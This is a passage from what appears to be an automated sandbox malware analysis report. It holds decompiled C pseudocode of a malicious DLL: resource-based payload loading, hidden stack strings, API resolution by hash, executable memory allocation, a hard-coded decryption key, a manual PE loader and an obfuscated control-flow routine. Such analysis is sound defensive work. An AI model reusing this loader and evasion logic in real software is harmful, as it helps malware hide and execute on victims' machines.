                                                                                                                          					 *0x100530bc = 0;
                                                                                                                          					 *0x100530c0 = 0;
                                                                                                                          					 *0x100530c8 = 0;
                                                                                                                          					 *0x100530c4 = 0;
                                                                                                                          					 *0x100530cc = 0;
                                                                                                                          					_v60 = 0;
                                                                                                                          					_v56 = 0;
                                                                                                                          					_t74 = FindResourceW(_a4, 0x1705, L"DASHBOARD"); // executed
                                                                                                                          					_v60 = _t74;
                                                                                                                          					_v56 = LoadResource(_a4, _v60);
                                                                                                                          					_v52 = SizeofResource(_a4, _v60);
                                                                                                                          					/* _v88.._v64: wide-character stack string "kernel32.dll", written one 16-bit unit at a time */
                                                                                                                          					_v88 = 0x6b;
                                                                                                                          					_v86 = 0x65;
                                                                                                                          					_v84 = 0x72;
                                                                                                                          					_v82 = 0x6e;
                                                                                                                          					_v80 = 0x65;
                                                                                                                          					_v78 = 0x6c;
                                                                                                                          					_v76 = 0x33;
                                                                                                                          					_v74 = 0x32;
                                                                                                                          					_v72 = 0x2e;
                                                                                                                          					_v70 = 0x64;
                                                                                                                          					_v68 = 0x6c;
                                                                                                                          					_v66 = 0x6c;
                                                                                                                          					_v64 = 0;
                                                                                                                          					/* _v40.._v22: wide-character stack string "ntdll.dll", written one 16-bit unit at a time */
                                                                                                                          					_v40 = 0x6e;
                                                                                                                          					_v38 = 0x74;
                                                                                                                          					_v36 = 0x64;
                                                                                                                          					_v34 = 0x6c;
                                                                                                                          					_v32 = 0x6c;
                                                                                                                          					_v30 = 0x2e;
                                                                                                                          					_v28 = 0x64;
                                                                                                                          					_v26 = 0x6c;
                                                                                                                          					_v24 = 0x6c;
                                                                                                                          					_v22 = 0;
                                                                                                                          					_t78 = E10006A90(_t131); // executed
                                                                                                                          					if(_t78 == 0) {
                                                                                                                          						_t45 =  &_v88; // 0x6b
                                                                                                                          						_t95 = E100048E0(_t45);
                                                                                                                          						_t121 = _t121 + 4;
                                                                                                                          						_v44 = _t95;
                                                                                                                          					}
                                                                                                                          					_t47 =  &_v40; // 0x6e
                                                                                                                          					_v48 = E100048E0(_t47);
                                                                                                                          					 *0x10055a7c = E100053D0(_v44, 0x6c705b40);
                                                                                                                          					 *0x10055a78 = E100053D0(_v44, 0x531ff383);
                                                                                                                          					_t133 =  *0x10055a78;
                                                                                                                          					if( *0x10055a78 == 0) {
                                                                                                                          						__eflags = 0x2000;
                                                                                                                          						_v12 = VirtualAlloc(0, _v52, 0x00002000 -  *0x100530cc | 0x00001000, 0x40);
                                                                                                                          					} else {
                                                                                                                          						_t93 =  *0x10055a78(0xffffffff, 0, _v52, 0x3000, 0x40, 0); // executed
                                                                                                                          						_v12 = _t93;
                                                                                                                          					}
                                                                                                                          					E1002FB00(_t96, _t118, _t119, _v12, _v56, _v52);
                                                                                                                          					_t104 =  *0x100530b4; // 0x2795
                                                                                                                          					_v16 = E1002F9A6(_t96, _v56, _t118, _t119, _t104);
                                                                                                                          					E10002970(_t133, _v16, "6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0", 0x24);
                                                                                                                          					_t109 = _v16;
                                                                                                                          					E10003EE0(_v16, _v12, _v52);
                                                                                                                          					_t92 = E100026A0(0x10055a64, _v12, _v52); // executed
                                                                                                                          					 *0x10055a8c = _t92;
                                                                                                                          					_t72 = 1;
                                                                                                                          				}
                                                                                                                          				return E1002F81E(_t72, _t96, _v20 ^ _t120, _t109, _t118, _t119);
                                                                                                                          			}


                                                                                                                          APIs
                                                                                                                            • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                          • _printf.LIBCMT ref: 1001265F
                                                                                                                          • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
                                                                                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                          • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
                                                                                                                          • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,-100510CC,00000040), ref: 100127D1
                                                                                                                          • _malloc.LIBCMT ref: 100127F5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                          • String ID: .$.$2$3$6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0$DASHBOARD$d$d$e$kre3.l$l$l$l$l$l$l$l$n$ndldl
                                                                                                                          • API String ID: 572389289-2839844625
                                                                                                                          • Opcode ID: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                          • Instruction ID: 8f66a7c676ce8d0fa2ca8bd8519024a549b55f77dd79b918ae70bd0eec3b217e
                                                                                                                          • Opcode Fuzzy Hash: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                          • Instruction Fuzzy Hash: FB613EB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          [Figure: control-flow graph of function 10002280 (image not reproduced; legend: executed / not executed). Node labels reference SetLastError, GetNativeSystemInfo, VirtualAlloc, GetProcessHeap, HeapAlloc and VirtualFree.]
                                                                                                                          C-Code - Quality: 89%
                                                                                                                          			E10002280(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                          				void* _v8;
                                                                                                                          				void* _v12;
                                                                                                                          				signed short* _v16;
                                                                                                                          				void* _v20;
                                                                                                                          				void* _v24;
                                                                                                                          				long _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				intOrPtr _v64;
                                                                                                                          				char _v68;
                                                                                                                          				void* _v72;
                                                                                                                          				intOrPtr _v76;
                                                                                                                          				intOrPtr* _v80;
                                                                                                                          				intOrPtr _v84;
                                                                                                                          				void* _v88;
                                                                                                                          				intOrPtr _v92;
                                                                                                                          				intOrPtr _v96;
                                                                                                                          				intOrPtr _v100;
                                                                                                                          				void* _t180;
                                                                                                                          				void* _t191;
                                                                                                                          				void* _t198;
                                                                                                                          				void* _t202;
                                                                                                                          				intOrPtr _t209;
                                                                                                                          				void* _t220;
                                                                                                                          				intOrPtr _t269;
                                                                                                                          				intOrPtr _t278;
                                                                                                                          				intOrPtr _t326;
                                                                                                                          
                                                                                                                          				_v100 = __ecx;
                                                                                                                          				_v72 = 0;
                                                                                                                          				_v20 = 0;
                                                                                                                          				if(E10001990(_v100, _a8, 0x40) != 0) {
                                                                                                                          					_v16 = _a4;
                                                                                                                          					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
                                                                                                                          						_t10 =  &(_v16[0x1e]); // 0xfffefe57
                                                                                                                          						if(E10001990(_v100, _a8,  *_t10 + 0xf8) != 0) {
                                                                                                                          							_t15 =  &(_v16[0x1e]); // 0xfffefe57
                                                                                                                          							_v80 = _a4 +  *_t15;
                                                                                                                          							if( *_v80 == 0x4550) {
                                                                                                                          								if(( *(_v80 + 4) & 0x0000ffff) == 0x14c) {
                                                                                                                          									if(( *(_v80 + 0x38) & 0x00000001) == 0) {
                                                                                                                          										_v84 = _v80 + ( *(_v80 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                          										_v32 =  *(_v80 + 0x38);
                                                                                                                          										_v12 = 0;
                                                                                                                          										while(_v12 < ( *(_v80 + 6) & 0x0000ffff)) {
                                                                                                                          											if( *((intOrPtr*)(_v84 + 0x10)) != 0) {
                                                                                                                          												_v88 =  *((intOrPtr*)(_v84 + 0xc)) +  *((intOrPtr*)(_v84 + 0x10));
                                                                                                                          											} else {
                                                                                                                          												_v88 =  *((intOrPtr*)(_v84 + 0xc)) + _v32;
                                                                                                                          											}
                                                                                                                          											if(_v88 > _v20) {
                                                                                                                          												_v20 = _v88;
                                                                                                                          											}
                                                                                                                          											_v12 = _v12 + 1;
                                                                                                                          											_v84 = _v84 + 0x28;
                                                                                                                          										}
                                                                                                                          										__imp__GetNativeSystemInfo( &_v68); // executed
                                                                                                                          										_t59 = _v64 - 1; // 0x71
                                                                                                                          										_v28 =  *((intOrPtr*)(_v80 + 0x50)) + _t59 &  !(_v64 - 1);
                                                                                                                          										_t65 = _v64 - 1; // -1
                                                                                                                          										if(_v28 == (_v20 + _t65 &  !(_v64 - 1))) {
                                                                                                                          											_t180 = VirtualAlloc( *(_v80 + 0x34), _v28, 0x3000, 4); // executed
                                                                                                                          											_v24 = _t180;
                                                                                                                          											if(_v24 != 0) {
                                                                                                                          												L26:
                                                                                                                          												_v72 = HeapAlloc(GetProcessHeap(), 8, 0x34);
                                                                                                                          												if(_v72 != 0) {
                                                                                                                          													 *((intOrPtr*)(_v72 + 4)) = _v24;
                                                                                                                          													asm("sbb edx, edx");
                                                                                                                          													 *(_v72 + 0x14) =  ~( ~( *(_v80 + 0x16) & 0x2000));
                                                                                                                          													 *((intOrPtr*)(_v72 + 0x1c)) = _a12;
                                                                                                                          													 *((intOrPtr*)(_v72 + 0x20)) = _a16;
                                                                                                                          													 *((intOrPtr*)(_v72 + 0x24)) = _a20;
                                                                                                                          													 *((intOrPtr*)(_v72 + 0x28)) = _a24;
                                                                                                                          													 *((intOrPtr*)(_v72 + 0x30)) = _v64;
                                                                                                                          													if(E10001990(_v100, _a8,  *(_v80 + 0x54)) != 0) {
                                                                                                                          														_t191 = VirtualAlloc(_v24,  *(_v80 + 0x54), 0x1000, 4); // executed
                                                                                                                          														_v8 = _t191;
                                                                                                                          														E10001810(_v8, _v16,  *(_v80 + 0x54));
                                                                                                                          														_t115 =  &(_v16[0x1e]); // 0xfffefe57
                                                                                                                          														 *_v72 = _v8 +  *_t115;
                                                                                                                          														 *((intOrPtr*)( *_v72 + 0x34)) = _v24;
                                                                                                                          														_t198 = E100019C0(_v100, _a4, _a8, _v80, _v72); // executed
                                                                                                                          														if(_t198 != 0) {
                                                                                                                          															_t269 =  *((intOrPtr*)( *_v72 + 0x34)) -  *(_v80 + 0x34);
                                                                                                                          															_v76 = _t269;
                                                                                                                          															if(_t269 == 0) {
                                                                                                                          																 *((intOrPtr*)(_v72 + 0x18)) = 1;
                                                                                                                          															} else {
                                                                                                                          																 *((intOrPtr*)(_v72 + 0x18)) = E10001EB0(_v100, _v72, _v76);
                                                                                                                          															}
                                                                                                                          															if(E10001FF0(_v100, _v72) != 0) {
                                                                                                                          																_t202 = E10001CB0(_v100, _v72); // executed
                                                                                                                          																if(_t202 != 0) {
                                                                                                                          																	if(E10001E30(_v100, _v72) != 0) {
                                                                                                                          																		if( *((intOrPtr*)( *_v72 + 0x28)) == 0) {
                                                                                                                          																			 *(_v72 + 0x2c) = 0;
                                                                                                                          																			L49:
                                                                                                                          																			return _v72;
                                                                                                                          																		}
                                                                                                                          																		if( *(_v72 + 0x14) == 0) {
                                                                                                                          																			 *(_v72 + 0x2c) = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
                                                                                                                          																			L47:
                                                                                                                          																			goto L49;
                                                                                                                          																		}
                                                                                                                          																		_v96 = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
                                                                                                                          																		_t209 =  *0x10055a88; // 0x0
                                                                                                                          																		_t278 =  *0x10055a84; // 0x1
                                                                                                                          																		_t326 =  *0x10055a80; // 0x10000000
                                                                                                                          																		_v92 = _v96(_t326, _t278, _t209);
                                                                                                                          																		if(_v92 != 0) {
                                                                                                                          																			 *((intOrPtr*)(_v72 + 0x10)) = 1;
                                                                                                                          																			goto L47;
                                                                                                                          																		}
                                                                                                                          																		SetLastError(0x45a);
                                                                                                                          																		L50:
                                                                                                                          																		E10002840(_v100, _v72);
                                                                                                                          																		return 0;
                                                                                                                          																	}
                                                                                                                          																	goto L50;
                                                                                                                          																}
                                                                                                                          																goto L50;
                                                                                                                          															}
                                                                                                                          															goto L50;
                                                                                                                          														}
                                                                                                                          														goto L50;
                                                                                                                          													}
                                                                                                                          													goto L50;
                                                                                                                          												}
                                                                                                                          												VirtualFree(_v24, 0, 0x8000);
                                                                                                                          												SetLastError(0xe);
                                                                                                                          												return 0;
                                                                                                                          											}
                                                                                                                          											_t220 = VirtualAlloc(0, _v28, 0x3000, 4); // executed
                                                                                                                          											_v24 = _t220;
                                                                                                                          											if(_v24 != 0) {
                                                                                                                          												goto L26;
                                                                                                                          											}
                                                                                                                          											SetLastError(0xe);
                                                                                                                          											return 0;
                                                                                                                          										}
                                                                                                                          										SetLastError(0xc1);
                                                                                                                          										return 0;
                                                                                                                          									}
                                                                                                                          									SetLastError(0xc1);
                                                                                                                          									return 0;
                                                                                                                          								}
                                                                                                                          								SetLastError(0xc1);
                                                                                                                          								return 0;
                                                                                                                          							}
                                                                                                                          							SetLastError(0xc1);
                                                                                                                          							return 0;
                                                                                                                          						}
                                                                                                                          						return 0;
                                                                                                                          					}
                                                                                                                          					SetLastError(0xc1);
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				return 0;
                                                                                                                          			}





























                                                                                                                          0x100025d2
                                                                                                                          0x00000000
                                                                                                                          0x10002583
                                                                                                                          0x00000000
                                                                                                                          0x10002512
                                                                                                                          0x10002497
                                                                                                                          0x1000249f
                                                                                                                          0x00000000
                                                                                                                          0x100024a5
                                                                                                                          0x10002454
                                                                                                                          0x1000245a
                                                                                                                          0x10002461
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10002465
                                                                                                                          0x00000000
                                                                                                                          0x1000246b
                                                                                                                          0x10002419
                                                                                                                          0x00000000
                                                                                                                          0x1000241f
                                                                                                                          0x10002353
                                                                                                                          0x00000000
                                                                                                                          0x10002359
                                                                                                                          0x10002336
                                                                                                                          0x00000000
                                                                                                                          0x1000233c
                                                                                                                          0x10002315
                                                                                                                          0x00000000
                                                                                                                          0x1000231b
                                                                                                                          0x00000000
                                                                                                                          0x100022f2
                                                                                                                          0x100022c8
                                                                                                                          0x00000000
                                                                                                                          0x100022ce
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                          • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1452528299-0
                                                                                                                          • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                          • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                          • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                          • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 80%
                                                                                                                          			E0079F8FD() {
                                                                                                                          				char _v520;
                                                                                                                          				char _v1040;
                                                                                                                          				char _v1560;
                                                                                                                          				signed int _v1564;
                                                                                                                          				signed int _v1568;
                                                                                                                          				signed int _v1572;
                                                                                                                          				signed int _v1576;
                                                                                                                          				signed int _v1580;
                                                                                                                          				signed int _v1584;
                                                                                                                          				signed int _v1588;
                                                                                                                          				signed int _v1592;
                                                                                                                          				signed int _v1596;
                                                                                                                          				signed int _v1600;
                                                                                                                          				signed int _v1604;
                                                                                                                          				signed int _v1608;
                                                                                                                          				signed int _v1612;
                                                                                                                          				signed int _v1616;
                                                                                                                          				signed int _v1620;
                                                                                                                          				signed int _v1624;
                                                                                                                          				signed int _v1628;
                                                                                                                          				signed int _v1632;
                                                                                                                          				signed int _v1636;
                                                                                                                          				signed int _v1640;
                                                                                                                          				signed int _v1644;
                                                                                                                          				signed int _v1648;
                                                                                                                          				signed int _v1652;
                                                                                                                          				signed int _v1656;
                                                                                                                          				signed int _v1660;
                                                                                                                          				signed int _v1664;
                                                                                                                          				signed int _v1668;
                                                                                                                          				signed int _v1672;
                                                                                                                          				signed int _v1676;
                                                                                                                          				signed int _v1680;
                                                                                                                          				signed int _v1684;
                                                                                                                          				signed int _v1688;
                                                                                                                          				signed int _v1692;
                                                                                                                          				signed int _v1696;
                                                                                                                          				signed int _v1700;
                                                                                                                          				signed short* _t368;
                                                                                                                          				signed int _t381;
                                                                                                                          				signed int* _t383;
                                                                                                                          				signed int _t385;
                                                                                                                          				signed int _t386;
                                                                                                                          				signed int _t387;
                                                                                                                          				signed int _t388;
                                                                                                                          				signed int _t389;
                                                                                                                          				signed int _t390;
                                                                                                                          				signed int _t391;
                                                                                                                          				signed int _t392;
                                                                                                                          				signed int _t393;
                                                                                                                          				signed int _t394;
                                                                                                                          				signed int _t395;
                                                                                                                          				signed int _t405;
                                                                                                                          				signed int* _t438;
                                                                                                                          				void* _t439;
                                                                                                                          				signed short* _t445;
                                                                                                                          				signed int* _t446;
                                                                                                                          
                                                                                                                          				_t446 =  &_v1700;
                                                                                                                          				_v1636 = 0x636551;
                                                                                                                          				_t2 =  &_v1636; // 0x636551
                                                                                                                          				_t385 = 0x5e;
                                                                                                                          				_v1636 =  *_t2 / _t385;
                                                                                                                          				_t383 = 0;
                                                                                                                          				_t386 = 0x7a;
                                                                                                                          				_t439 = 0x12dab9f;
                                                                                                                          				_v1636 = _v1636 * 0x55;
                                                                                                                          				_v1636 = _v1636 ^ 0x0059e0ec;
                                                                                                                          				_v1616 = 0x84ec4b;
                                                                                                                          				_v1616 = _v1616 + 0xffff958e;
                                                                                                                          				_v1616 = _v1616 << 6;
                                                                                                                          				_v1616 = _v1616 ^ 0x212f9cfc;
                                                                                                                          				_v1624 = 0x57c2af;
                                                                                                                          				_v1624 = _v1624 / _t386;
                                                                                                                          				_v1624 = _v1624 >> 0xa;
                                                                                                                          				_v1624 = _v1624 ^ 0x000a9340;
                                                                                                                          				_v1676 = 0x94d6a3;
                                                                                                                          				_v1676 = _v1676 >> 3;
                                                                                                                          				_t387 = 0x41;
                                                                                                                          				_v1676 = _v1676 * 0x79;
                                                                                                                          				_v1676 = _v1676 * 0x68;
                                                                                                                          				_v1676 = _v1676 ^ 0x9280c2f7;
                                                                                                                          				_v1644 = 0x578290;
                                                                                                                          				_v1644 = _v1644 | 0x80e552f7;
                                                                                                                          				_v1644 = _v1644 + 0xffffd80b;
                                                                                                                          				_v1644 = _v1644 ^ 0x80feae5e;
                                                                                                                          				_v1652 = 0x70c956;
                                                                                                                          				_v1652 = _v1652 ^ 0x31ba76f8;
                                                                                                                          				_v1652 = _v1652 ^ 0x87f2510e;
                                                                                                                          				_v1652 = _v1652 ^ 0xb63594c0;
                                                                                                                          				_v1696 = 0x39dcdb;
                                                                                                                          				_v1696 = _v1696 * 0x22;
                                                                                                                          				_v1696 = _v1696 >> 0xf;
                                                                                                                          				_v1696 = _v1696 * 0x75;
                                                                                                                          				_v1696 = _v1696 ^ 0x000247c6;
                                                                                                                          				_v1572 = 0x793846;
                                                                                                                          				_v1572 = _v1572 + 0xfc60;
                                                                                                                          				_v1572 = _v1572 ^ 0x007fa213;
                                                                                                                          				_v1576 = 0x3629f6;
                                                                                                                          				_v1576 = _v1576 | 0x7f6cc17b;
                                                                                                                          				_v1576 = _v1576 ^ 0x7f7c74a2;
                                                                                                                          				_v1600 = 0x630dc0;
                                                                                                                          				_v1600 = _v1600 | 0x8a3170d6;
                                                                                                                          				_v1600 = _v1600 ^ 0x8a7fe201;
                                                                                                                          				_v1664 = 0xe79625;
                                                                                                                          				_v1664 = _v1664 * 0x57;
                                                                                                                          				_v1664 = _v1664 ^ 0xe47ae09a;
                                                                                                                          				_v1664 = _v1664 + 0xffff598f;
                                                                                                                          				_v1664 = _v1664 ^ 0xaac0e7d1;
                                                                                                                          				_v1648 = 0xac147c;
                                                                                                                          				_v1648 = _v1648 << 4;
                                                                                                                          				_v1648 = _v1648 / _t387;
                                                                                                                          				_v1648 = _v1648 ^ 0x00264750;
                                                                                                                          				_v1588 = 0x745952;
                                                                                                                          				_t98 =  &_v1588; // 0x745952
                                                                                                                          				_v1588 =  *_t98 * 0x3a;
                                                                                                                          				_v1588 = _v1588 ^ 0x1a53f4d8;
                                                                                                                          				_v1672 = 0x57a21b;
                                                                                                                          				_t388 = 0x49;
                                                                                                                          				_v1672 = _v1672 / _t388;
                                                                                                                          				_t389 = 0x63;
                                                                                                                          				_v1672 = _v1672 / _t389;
                                                                                                                          				_v1672 = _v1672 | 0xd6f4ed27;
                                                                                                                          				_v1672 = _v1672 ^ 0xd6feee0f;
                                                                                                                          				_v1620 = 0xc904e8;
                                                                                                                          				_t390 = 0x17;
                                                                                                                          				_v1620 = _v1620 * 0x6d;
                                                                                                                          				_v1620 = _v1620 + 0x178d;
                                                                                                                          				_v1620 = _v1620 ^ 0x5592dda0;
                                                                                                                          				_v1688 = 0x59d198;
                                                                                                                          				_v1688 = _v1688 | 0x5938a823;
                                                                                                                          				_v1688 = _v1688 ^ 0x788d0eee;
                                                                                                                          				_v1688 = _v1688 + 0xffff1978;
                                                                                                                          				_v1688 = _v1688 ^ 0x21fe2fab;
                                                                                                                          				_v1612 = 0xa097a2;
                                                                                                                          				_v1612 = _v1612 << 9;
                                                                                                                          				_v1612 = _v1612 / _t390;
                                                                                                                          				_v1612 = _v1612 ^ 0x02dc2d90;
                                                                                                                          				_v1700 = 0xb7b4a0;
                                                                                                                          				_t391 = 0x36;
                                                                                                                          				_v1700 = _v1700 / _t391;
                                                                                                                          				_v1700 = _v1700 >> 1;
                                                                                                                          				_v1700 = _v1700 | 0xee164e4b;
                                                                                                                          				_v1700 = _v1700 ^ 0xee1e6de5;
                                                                                                                          				_v1680 = 0xe4ad14;
                                                                                                                          				_v1680 = _v1680 | 0xe839ddc8;
                                                                                                                          				_v1680 = _v1680 ^ 0xfe881b96;
                                                                                                                          				_t392 = 0x42;
                                                                                                                          				_v1680 = _v1680 * 0x4e;
                                                                                                                          				_v1680 = _v1680 ^ 0xd7ed2c6e;
                                                                                                                          				_v1656 = 0xa710a4;
                                                                                                                          				_v1656 = _v1656 + 0xfffff8f1;
                                                                                                                          				_v1656 = _v1656 ^ 0xcc5b21c1;
                                                                                                                          				_v1656 = _v1656 ^ 0xccf98fb8;
                                                                                                                          				_v1628 = 0x5fc40d;
                                                                                                                          				_v1628 = _v1628 + 0xb682;
                                                                                                                          				_v1628 = _v1628 << 6;
                                                                                                                          				_v1628 = _v1628 ^ 0x181c8c04;
                                                                                                                          				_v1640 = 0xd7aa78;
                                                                                                                          				_v1640 = _v1640 + 0x8e1d;
                                                                                                                          				_v1640 = _v1640 / _t392;
                                                                                                                          				_v1640 = _v1640 ^ 0x0007a72a;
                                                                                                                          				_v1580 = 0xbf48f6;
                                                                                                                          				_t393 = 0x25;
                                                                                                                          				_v1580 = _v1580 * 0xd;
                                                                                                                          				_v1580 = _v1580 ^ 0x09b7b49e;
                                                                                                                          				_v1564 = 0xff195;
                                                                                                                          				_v1564 = _v1564 + 0x8c1b;
                                                                                                                          				_v1564 = _v1564 ^ 0x00104e06;
                                                                                                                          				_v1684 = 0xbf1e83;
                                                                                                                          				_v1684 = _v1684 / _t393;
                                                                                                                          				_t394 = 0x77;
                                                                                                                          				_v1684 = _v1684 / _t394;
                                                                                                                          				_v1684 = _v1684 + 0xa662;
                                                                                                                          				_v1684 = _v1684 ^ 0x0006fc0d;
                                                                                                                          				_v1596 = 0xc39bae;
                                                                                                                          				_v1596 = _v1596 << 2;
                                                                                                                          				_v1596 = _v1596 ^ 0x030cfbaf;
                                                                                                                          				_v1568 = 0x66568e;
                                                                                                                          				_v1568 = _v1568 | 0x44ac0d6e;
                                                                                                                          				_v1568 = _v1568 ^ 0x44e9cf2b;
                                                                                                                          				_v1692 = 0x3d2b27;
                                                                                                                          				_v1692 = _v1692 + 0x3fae;
                                                                                                                          				_t395 = 0x71;
                                                                                                                          				_v1692 = _v1692 / _t395;
                                                                                                                          				_v1692 = _v1692 + 0xffff1a11;
                                                                                                                          				_v1692 = _v1692 ^ 0xffffbf57;
                                                                                                                          				_v1632 = 0xb4dfda;
                                                                                                                          				_v1632 = _v1632 * 9;
                                                                                                                          				_v1632 = _v1632 >> 3;
                                                                                                                          				_v1632 = _v1632 ^ 0x00c4553b;
                                                                                                                          				_v1584 = 0x206e7a;
                                                                                                                          				_v1584 = _v1584 << 7;
                                                                                                                          				_v1584 = _v1584 ^ 0x10371375;
                                                                                                                          				_v1592 = 0x689459;
                                                                                                                          				_v1592 = _v1592 + 0xffffb773;
                                                                                                                          				_v1592 = _v1592 ^ 0x00637077;
                                                                                                                          				_v1660 = 0x8b14df;
                                                                                                                          				_v1660 = _v1660 << 0xd;
                                                                                                                          				_v1660 = _v1660 + 0x9803;
                                                                                                                          				_v1660 = _v1660 << 0xa;
                                                                                                                          				_v1660 = _v1660 ^ 0x71eeeb6f;
                                                                                                                          				_v1608 = 0x8e767e;
                                                                                                                          				_v1608 = _v1608 | 0xfaf7fbb6;
                                                                                                                          				_v1608 = _v1608 ^ 0xfaf9bdf5;
                                                                                                                          				_v1668 = 0xccd677;
                                                                                                                          				_v1668 = _v1668 * 0x78;
                                                                                                                          				_v1668 = _v1668 + 0xffff6b3d;
                                                                                                                          				_v1668 = _v1668 + 0xf0ff;
                                                                                                                          				_v1668 = _v1668 ^ 0x600a3b9e;
                                                                                                                          				_v1604 = 0x7c05f9;
                                                                                                                          				_v1604 = _v1604 + 0xd55a;
                                                                                                                          				_v1604 = _v1604 ^ 0x007aedaa;
                                                                                                                          				_t445 = _v1604;
                                                                                                                          				while(_t439 != 0x12dab9f) {
                                                                                                                          					if(_t439 == 0x2f8e73a) {
                                                                                                                          						_push(_v1604);
                                                                                                                          						_push(_t383);
                                                                                                                          						_push(_t395);
                                                                                                                          						_push(_t383);
                                                                                                                          						_push(_t383);
                                                                                                                          						_push(_v1668);
                                                                                                                          						_push(_t445);
                                                                                                                          						E0079AB87(_v1660, _v1608, __eflags);
                                                                                                                          						_t383 = 1;
                                                                                                                          						__eflags = 1;
                                                                                                                          						L23:
                                                                                                                          						return _t383;
                                                                                                                          					}
                                                                                                                          					if(_t439 == 0x92208ae) {
                                                                                                                          						_t368 = _t445;
                                                                                                                          						__eflags =  *_t445 - _t383;
                                                                                                                          						if(__eflags == 0) {
                                                                                                                          							L18:
                                                                                                                          							_t439 = 0xeef82b0;
                                                                                                                          							continue;
                                                                                                                          						} else {
                                                                                                                          							goto L11;
                                                                                                                          						}
                                                                                                                          						do {
                                                                                                                          							L11:
                                                                                                                          							__eflags =  *_t368 - 0x2c;
                                                                                                                          							if( *_t368 != 0x2c) {
                                                                                                                          								goto L17;
                                                                                                                          							}
                                                                                                                          							_t438 =  &_v1560;
                                                                                                                          							while(1) {
                                                                                                                          								_t368 =  &(_t368[1]);
                                                                                                                          								_t405 =  *_t368 & 0x0000ffff;
                                                                                                                          								__eflags = _t405;
                                                                                                                          								if(_t405 == 0) {
                                                                                                                          									break;
                                                                                                                          								}
                                                                                                                          								__eflags = _t405 - 0x20;
                                                                                                                          								if(_t405 == 0x20) {
                                                                                                                          									break;
                                                                                                                          								}
                                                                                                                          								 *_t438 = _t405;
                                                                                                                          								_t438 =  &(_t438[0]);
                                                                                                                          								__eflags = _t438;
                                                                                                                          							}
                                                                                                                          							_t395 = 0;
                                                                                                                          							__eflags = 0;
                                                                                                                          							 *_t438 = 0;
                                                                                                                          							L17:
                                                                                                                          							_t368 =  &(_t368[1]);
                                                                                                                          							__eflags =  *_t368 - _t383;
                                                                                                                          						} while (__eflags != 0);
                                                                                                                          						goto L18;
                                                                                                                          					}
                                                                                                                          					if(_t439 == 0x99a67ee) {
                                                                                                                          						_t445 = E0079F899(_t395);
                                                                                                                          						_t439 = 0x92208ae;
